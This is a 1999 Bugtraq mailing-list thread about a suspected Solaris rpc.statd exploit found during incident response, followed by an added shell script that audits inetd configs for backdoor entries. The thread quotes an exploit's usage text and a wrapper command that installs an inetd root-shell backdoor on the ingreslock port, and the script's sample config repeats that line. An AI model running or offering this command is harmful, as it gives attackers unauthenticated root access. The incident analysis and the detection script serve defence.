Bugtraq mailing list archives

Re: Vulnerability in Solaris 2.6. rpc.statd ?


From: toddr () ARC COM (Bob Todd)
Date: Tue, 24 Aug 1999 14:10:40 -0400


I found two binary-only exploits on a hacked machine.  The one of most
interest was "amexp" which when executed without arguments presents
the following:

    Usage: ./amexp address cache command type [port]

    Further help:

        address    -    system address
        cache      -    system hostname
        command    -    execute this command
        type       -    0: Solaris 2.5.1 stock,
                            1: Solaris 2.5.1 patched, 2.6 & 2.7
        port       -    optional port to bypass portmapper

A shell script that was included was "go.amexp" which contained:

./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' >
/tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3

The command is nearly identical to what is used for both tooltalk and
rpc.cmsd attacks.

The proper patches were installed and I do not believe that it is the
statd/automountd exploit since no indirect rpc services execution was
attempted.

This incident is closed.

----- Original Message -----
From: Tabor J . Wells <twells () shore net>
To: Bob Todd <todd () home arc com>
Cc: <BUGTRAQ () securityfocus com>
Sent: Tuesday, August 24, 1999 1:52 PM
Subject: Re: Vulnerability in Solaris 2.6. rpc.statd ?

On Sat, Aug 21, 1999 at 12:31:18PM -0400,
Bob Todd <toddr () ARC COM> is thought to have said:

While performing an on-site incident response at _______, I found
several Solaris-oriented exploit programs including a statd2.6 (others
were calendar manager, tooltalk, and lockd?).  Since there is an
exploit program for statd on Solaris 2.6, I could conclude that
Solaris 2.6 statd is vulnerable to attack.  I have not tried the
exploit, but since the machine was probably compromised by one of
these programs, the threat seems real!!

And did this server have the statd patch installed (106592-02 on
sparc and 106593-02 on x86)? Did it have the various security patches
for the other services mentioned installed as well?

Perhaps the program was part of the exploit which allowed indirect RPC
calls with statd that was discussed here (and elsewhere) several weeks
back.

I don't think your conclusion is supported given the information you
provided. Perhaps you could provide more information about the exploit
before rushing to claim that there is a new vulnerability.

Tabor

--

________________________________________________________________________
Tabor J. Wells
twells () smarterliving com
Technology Manager
http://www.smarterliving.com
Smarter Living, Inc.                    It's your time. It's your money.
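The go.amexp line in Bob Todd's message writes an inetd entry that serves a root shell on the ingreslock service and starts a second inetd on that file. The audit script below is an added example, not part of the thread, that checks an inetd-format config for that pattern; the sample config, the scratch-path heuristic, and the function names are constructed assumptions.

```shell
#!/bin/sh
# Added example, not from the thread: audit an inetd-format config for
# entries that hand a shell to whoever connects (the go.amexp pattern).
# Field order per inetd.conf: service socket proto wait user server_program args

audit_inetd_conf() {
    found=0
    while read -r svc sock proto waitmode user prog args; do
        case "$svc" in ''|\#*) continue ;; esac   # skip blanks and comments
        reason=''
        case "$prog" in
            /bin/sh|/sbin/sh|/usr/bin/sh|*/ksh|*/csh|*/bash)
                reason='server program is a shell' ;;
            /tmp/*|/var/tmp/*|/dev/*)
                reason='server program lives in a scratch or device path' ;;
        esac
        if [ -n "$reason" ]; then
            found=1
            printf 'SUSPICIOUS (%s): %s %s %s %s %s %s %s\n' \
                "$reason" "$svc" "$sock" "$proto" "$waitmode" "$user" "$prog" "$args"
        fi
    done < "$1"
    return $found   # 0 = nothing flagged, 1 = at least one hit
}

# go.amexp starts a second inetd against a file in /tmp, so the command
# lines of running inetd processes are worth a look too (host-specific output).
list_inetd_processes() {
    ps -eo args 2>/dev/null | grep '[i]netd' || true
}

# Constructed sample (not the compromised host's file): two normal services,
# the ingreslock line from go.amexp, and a loader hidden under /tmp.
SAMPLE_CONF=$(mktemp /tmp/inetd-audit.XXXXXX)
cat > "$SAMPLE_CONF" <<'EOF'
# sample inetd.conf
telnet     stream tcp nowait root   /usr/sbin/in.telnetd in.telnetd
finger     stream tcp nowait nobody /usr/sbin/in.fingerd in.fingerd
ingreslock stream tcp nowait root   /bin/sh sh
echo       stream tcp nowait root   /tmp/.x/echod echod
EOF

audit_inetd_conf "$SAMPLE_CONF" || echo "review the flagged entries above"
```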


